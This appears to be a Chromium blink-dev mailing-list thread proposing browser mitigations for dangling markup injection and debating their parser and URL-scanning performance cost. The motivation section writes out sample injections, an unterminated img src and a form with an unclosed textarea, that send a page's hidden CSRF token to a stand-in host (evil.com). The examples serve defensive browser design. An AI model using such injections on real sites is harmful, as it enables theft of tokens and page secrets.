Intent to Implement: Dangling markup mitigations.

Mike West

Jan 17, 2017, 5:43:26 AM
to blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
(crossposted to blink-dev@ and security-dev@, and CCing some specific folks who might be interested)

# Contact Emails

# Spec
None yet. I will submit pull requests against the HTML specification if we decide that the experiments discussed below are at all reasonable.

# Summary
This Intent is a little vague, as I'm still exploring the space, but I'm adding metrics for a few concrete proposals, so poking at the list seems like a reasonable thing to do (both for visibility and for new/better ideas). In particular:

1. https://codereview.chromium.org/2626243002 adds metrics for `\n` and `<` occurring inside `<base target>` (a sketch of this injection shape follows the list).

2. https://codereview.chromium.org/2628723004 adds metrics for `<textarea>` and `<select>` being closed by end-of-file, and a flag to block form submission in those cases.

3. https://codereview.chromium.org/2629393002 adds metrics for `\n` and `<` characters occurring during URL parsing (e.g. as a result of processing `<img src>` or `<link href>`). https://codereview.chromium.org/2634893003 adds a flag to cause such resolutions to error out for non-`data:`/`javascript:` URLs.
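As a concrete illustration of case 1, here's a hedged sketch of the injection shape involved (the injected fragment and `attacker.example` are hypothetical placeholders, not an observed attack):

```html
<!-- The attacker injects an unterminated <base> tag at the injection point: -->
<base target='
<!-- Everything below, up to the next single quote on the page, is swallowed
     into the target attribute: newlines, `<` characters, secrets and all.   -->
<input type="hidden" name="csrf" value="token">
<a href="https://attacker.example/">some link</a>
```

A hand-authored `target` value essentially never contains `\n` or `<`, which is why those characters are a good signal that page content has been swallowed. If the user then follows a link to a page the attacker can read (or the attacker injects such a link), the new window's `window.name` carries the captured text.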

It's not clear whether these mitigations will be effective or whether we'll need to address things in some other way. If/when we come to agreement on an approach, I'll come back to blink-dev@ with more specific intents to ship (intent to ships?).

# Motivation
Once we kill off XSS as a viable attack vector (which somehow seems to be taking marginally longer than expected *cough*), dangling markup attacks look like the next-softest target. I'm hopeful that we can mitigate the impact of this class of attack with some small changes to HTML's tokenizer/tree builder, URL resolution, and form submission.

For example, hidden form data (`<input type=hidden name=csrf value=token>`) can be exfiltrated via an injection like `<img src="https://evil.com/?secrets=`. Since the injection leaves the attribute value open, the page content that follows is consumed into the URL until the next `"`, and the result is nicely URL-encoded and delivered to the attacker via the image request.
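A minimal sketch of that shape (`evil.com` and the token value are placeholders; the victim form uses unquoted attributes so no stray `"` ends the capture early):

```html
<!-- The attacker's injected fragment ends mid-attribute, with no closing quote: -->
<img src="https://evil.com/?secrets=
<!-- The tokenizer consumes everything below as part of the src value, up to
     the next `"` on the page, hidden token included: -->
<form action=/transfer method=POST>
  <input type=hidden name=csrf value=token>
</form>
<!-- The image request then leaks roughly
     https://evil.com/?secrets=...value=token... in URL-encoded form. -->
```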

Injecting an unclosed `<textarea>` has a similar effect, as it likewise consumes the page until a closing `</textarea>` or EOF. Exfiltration here additionally requires clickjacking the user into submitting the surrounding form, but that's not much of a speed bump.
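Sketched with placeholder names (proposal 2 above would block submission of exactly this kind of form, since its `<textarea>` is only closed by end-of-file):

```html
<!-- The attacker injects a form targeting their server, a visible submit
     button, and an unclosed <textarea>. Everything that follows on the
     page, down to a closing </textarea> or EOF, becomes the field's value: -->
<form action="https://evil.com/collect" method="POST">
  <input type="submit" value="Click me!">
  <textarea name="stolen">
<input type=hidden name=csrf value=token>
... rest of the original page ...
```

One clickjacked click on the submit button then POSTs the captured content to the attacker.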

# Interop Risk
Folks at Mozilla seem (reluctantly) on board with the general notion of changing form submission (https://github.com/whatwg/html/issues/2253). I haven't made concrete proposals for the attribute-value cases yet, but initial reactions there are somewhat more skeptical.

I think we'll have deeper discussions once we know what the numbers look like, but I'm hopeful that we can agree upon a small and targeted set of changes that reasonably balances any added complexity against the mitigation we'd gain.

# Compat Risk
Unclear. The metrics I'm adding should give us some data about the impact on the status quo. It might turn out that the numbers are super-high in general, in which case my focus might shift to opt-in mechanisms that would allow developers to make individual decisions about risks. I'd prefer a change to the defaults, of course, but I'll take what I can get based on the numbers. :)

# Technical Constraints
None.

# All Blink Platforms?
Yes.

# OWP Bug

# Chromestatus
None yet; I'll create entries here once I have concrete proposals specced and tested.

# Requesting approval to ship?
Nope.

-mike

Elliott Sprehn

Jan 17, 2017, 7:27:10 PM
to Mike West, blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
I have a concern that this is going to make us slower. We already know that the parser is in general "slow" because it's so branchy; simplifying the parser has yielded 20x+ improvements in experiments. I worry that adding even more complexity to the parser is doubling down on the slowness. I'm also concerned about making URL processing slower for pages with lots of URLs, like Wikipedia articles and long email threads.

On Tue, Jan 17, 2017 at 2:43 AM, Mike West <mk...@chromium.org> wrote:

2. https://codereview.chromium.org/2628723004 adds metrics for `<textarea>` and `<select>` being closed by end-of-file, and a flag to block form submission in those cases.

This puts an extra branch (and a couple of nested tests) in the cleanup loop at the end of parsing. I guess most pages don't have lots of tags open, though?

3. https://codereview.chromium.org/2629393002 adds metrics for `\n` and `<` characters occurring during URL parsing (e.g. as a result of processing `<img src>` or `<link href>`). https://codereview.chromium.org/2634893003 adds a flag to cause such resolutions to error out for non-`data:`/`javascript:` URLs.

This is putting three string scans over every URL we resolve in the engine, just for a use counter. I'd actually like us to revert this one: I don't think we'd want the spec to require this, but I also don't think we should be paying that cost on every URL in the document. Our URL processing is already a bottleneck on pages with lots of links, like Wikipedia.

Mike West

Jan 18, 2017, 1:42:14 AM
to Elliott Sprehn, blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
On Wed, Jan 18, 2017 at 1:26 AM, Elliott Sprehn <esp...@chromium.org> wrote:
I have a concern that this is going to make us slower. We already know that the parser is in general "slow" because it's so branchy; simplifying the parser has yielded 20x+ improvements in experiments. I worry that adding even more complexity to the parser is doubling down on the slowness. I'm also concerned about making URL processing slower for pages with lots of URLs, like Wikipedia articles and long email threads.

These are reasonable concerns. I hope we can find a happy balance between the kinds of protections we can build into the platform and the cost of those protections.
 
On Tue, Jan 17, 2017 at 2:43 AM, Mike West <mk...@chromium.org> wrote:

2. https://codereview.chromium.org/2628723004 adds metrics for `<textarea>` and `<select>` being closed by end-of-file, and a flag to block form submission in those cases.

This puts an extra branch (and a couple of nested tests) in the cleanup loop at the end of parsing. I guess most pages don't have lots of tags open, though?

That's my intuition, yes. I also explicitly called out perf as part of the review, and the html/parser OWNERS seemed unconcerned.

3. https://codereview.chromium.org/2629393002 adds metrics for `\n` and `<` characters occurring during URL parsing (e.g. as a result of processing `<img src>` or `<link href>`). https://codereview.chromium.org/2634893003 adds a flag to cause such resolutions to error out for non-`data:`/`javascript:` URLs.

This is putting three string scans over every URL we resolve in the engine, just for a use counter. I'd actually like us to revert this one: I don't think we'd want the spec to require this, but I also don't think we should be paying that cost on every URL in the document. Our URL processing is already a bottleneck on pages with lots of links, like Wikipedia.

That's fair. I'd naively assumed that scanning through a string for a single character would be "fast enough"; thanks for the correction. With that in mind, though, we can do a lot better than the initial patch. I've uploaded https://codereview.chromium.org/2643613002, which should be significantly faster; I'd appreciate you taking a look.
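(For readers following along, here's the rough difference, sketched in JS rather than Blink's actual C++. The function names are hypothetical, it assumes the three scanned characters are `\n`, `\r`, and `<`, and it isn't necessarily what the patch does:)

```html
<script>
  // Naive version: one full scan of the string per character of interest.
  function hasDanglingMarkupCharsNaive(url) {
    return url.includes("\n") || url.includes("\r") || url.includes("<");
  }
  // Fused version: a single pass that tests each character once.
  function hasDanglingMarkupCharsFused(url) {
    for (const c of url) {
      if (c === "\n" || c === "\r" || c === "<") return true;
    }
    return false;
  }
</script>
```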

-mike

Charles Harrison

Jan 18, 2017, 9:10:30 AM
to Mike West, Kouhei Ueno, Elliott Sprehn, blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
+kouhei, do we have any CPU-bound HTML parser perf bots running? I was skeptical that a few extra tests/branches would cause major problems, but it would be much easier to review these patches if there were a low-noise bot that would ding us if we messed up.

WRT URL scanning: my measurements have shown that checking for URL whitespace (a simple loop with a single branch and a few tests) accounts for 1/4 to 1/5 of URL-parsing time even for URLs without any whitespace (i.e. with perfect branch prediction). So adding any simple scan through the URL will add at least that much overhead.
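(For anyone unfamiliar with the term, "URL whitespace" refers to the ASCII tab and newline characters that URL parsing strips from its input; e.g. both anchors in this sketch resolve to the same URL:)

```html
<!-- Tabs and newlines embedded in a URL are removed during URL parsing,
     so both hrefs below resolve to https://example.com/path: -->
<a href="https://example.com/path">one</a>
<a href="https://exam
ple.com/path">two</a>
```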


Kouhei Ueno

Jan 18, 2017, 9:52:38 AM
to Charles Harrison, Mike West, Elliott Sprehn, blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
I chatted w/ esprehn@ about this. (Please correct me if I got things wrong.)
Some facts:
- The HTML tokenizer / tree-builder is far from optimal. An internal experiment showed that it could be two orders of magnitude faster than its current state if we drastically simplified the grammar.
-- Even with the full spec grammar, I'm quite confident that we can apply modern interpreter optimization techniques to get close to that.
- However, the amount of time spent in the tokenizer/tree-builder seems trivial compared to other components, which doesn't really justify the optimization work at the moment.

re: https://codereview.chromium.org/2628723004 
We should keep an eye on PerformanceTests/Parser/tiny-innerHTML.html, but I'm also skeptical that this would run into major problems. It adds a branch per HTMLToken in TextMode, but I don't expect a large number of tokens to go through the tree builder (multiple characters are buffered into a single Character HTMLToken), and we can optimize the branch away if we really need to by merging the state into InsertionMode.
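(For reference, a sketch of the shape of such a micro-benchmark; this is an illustrative approximation, not the actual PerformanceTests file:)

```html
<div id="sandbox"></div>
<script>
  // Parse a tiny fragment many times so that per-token parser overhead,
  // rather than layout or style, dominates the measurement.
  const sandbox = document.getElementById("sandbox");
  const start = performance.now();
  for (let i = 0; i < 100000; i++) {
    sandbox.innerHTML = "<p>tiny</p>";
  }
  console.log(`elapsed: ${(performance.now() - start).toFixed(1)} ms`);
</script>
```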

+1 to csharrison@'s view of URL scanning.
--
kouhei

Dominic Cooney

Jan 18, 2017, 11:29:17 PM
to Kouhei Ueno, Charles Harrison, Mike West, Elliott Sprehn, blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
On Wed, Jan 18, 2017 at 11:52 PM, 'Kouhei Ueno' via blink-dev <blin...@chromium.org> wrote:
I chatted w/ esprehn@ about this. (Please correct me if I got things wrong.)
Some facts:
- The HTML tokenizer / tree-builder is far from optimal. An internal experiment showed that it could be two orders of magnitude faster than its current state if we drastically simplified the grammar.

This reported number seems to vary a lot. Could someone share data?
 
-- Even with the full spec grammar, I'm quite confident that we can apply modern interpreter optimization techniques to get close to that.
- However, the amount of time spent in the tokenizer/tree-builder seems trivial compared to other components, which doesn't really justify the optimization work at the moment.

We do have a bunch of problems with the tree-builder simulator and the actual tree builder making different decisions, so maybe some improvements could ride along with the correctness fixes. I would still like to help with this; I'm just a bit oversubscribed.

Adam Barth

Jan 19, 2017, 12:20:25 AM
to Dominic Cooney, Kouhei Ueno, Charles Harrison, Mike West, Elliott Sprehn, blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
On Wed, Jan 18, 2017 at 8:29 PM Dominic Cooney <domi...@chromium.org> wrote:
On Wed, Jan 18, 2017 at 11:52 PM, 'Kouhei Ueno' via blink-dev <blin...@chromium.org> wrote:
I chatted w/ esprehn@ about this. (Please correct me if I got things wrong.)
Some facts:
- The HTML tokenizer / tree-builder is far from optimal. An internal experiment showed that it could be two orders of magnitude faster than its current state if we drastically simplified the grammar.

This reported number seems to vary a lot. Could someone share data?

The number we measured in the experiment was a 19x speedup in parsing. The corpus we parsed was the HTML specification (as it stood at the time, a few years ago). Obviously, the simplified parser produced a different DOM, so the comparison isn't as direct as one between two implementations that produce the same DOM.

Adam
